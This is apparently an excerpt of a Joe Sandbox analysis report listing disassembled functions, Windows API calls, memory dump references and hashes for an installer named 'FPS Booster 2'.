                                                Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID:
                                                • API String ID: 4115351271-0
                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                Function 00403D6B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • SetDlgItemTextW.USER32(?,?,00000000), ref: 00403D85
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ItemTextVersion
                                                • String ID:
                                                • API String ID: 1287519508-0
                                                • Opcode ID: ecc267a58f007a645cce87880ef4dcbc169c5a84c400769f7d645cc81fbf47b3
                                                • Instruction ID: 3d91de8bf8cbd2b1f3a3cf9e9dcc3d672f8c1b7d0241b958bd96d56531da4427
                                                • Opcode Fuzzy Hash: ecc267a58f007a645cce87880ef4dcbc169c5a84c400769f7d645cc81fbf47b3
                                                • Instruction Fuzzy Hash: 7EC04C76148300BFE641A759CC46F1FB799EFA4719F00C52EB19CE11D5CA398420DA26
                                                Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                Function 6E9E1581 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,6E9E15BA,?,?,6E9E185F,?,6E9E1017), ref: 6E9E158B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 7e2b3d4700722790af89b3a8938b365cbfcfcf0c0bbcd54c2ff01de6e91b439b
                                                • Instruction ID: 29757e3f2a97f70e03f7b4572dd48eea126e25d332dc10dfecaa678977f58efb
                                                • Opcode Fuzzy Hash: 7e2b3d4700722790af89b3a8938b365cbfcfcf0c0bbcd54c2ff01de6e91b439b
                                                • Instruction Fuzzy Hash: 6CB012F1604400AFEF00C724CC0EF343BA4EF01306F000090B704D1041C1204C008D14

                                                Non-executed Functions

                                                Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                • CloseHandle.KERNEL32(00000000), ref: 004052EC
                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                • ShowWindow.USER32(00000008), ref: 0040535F
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                • EmptyClipboard.USER32 ref: 0040543D
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                • CloseClipboard.USER32 ref: 0040549A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                • String ID: New install of "%s" to "%s"${
                                                • API String ID: 2110491804-1641061399
                                                • Opcode ID: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                • Opcode Fuzzy Hash: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $ @$M$N
                                                • API String ID: 1638840714-3479655940
                                                • Opcode ID: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                • Opcode Fuzzy Hash: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                • lstrcmpiW.KERNEL32(Show,00451D98,00000000,?,?), ref: 004046A6
                                                • lstrcatW.KERNEL32(?,Show), ref: 004046B2
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                • String ID: A$Show
                                                • API String ID: 3347642858-4076820621
                                                • Opcode ID: 450c1996ff3fe57422673dbeff918444172cade2dc46c3f90f2ec1556e888b3b
                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                • Opcode Fuzzy Hash: 450c1996ff3fe57422673dbeff918444172cade2dc46c3f90f2ec1556e888b3b
                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                • API String ID: 1916479912-1189179171
                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                Strings
                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                • API String ID: 542301482-1377821865
                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
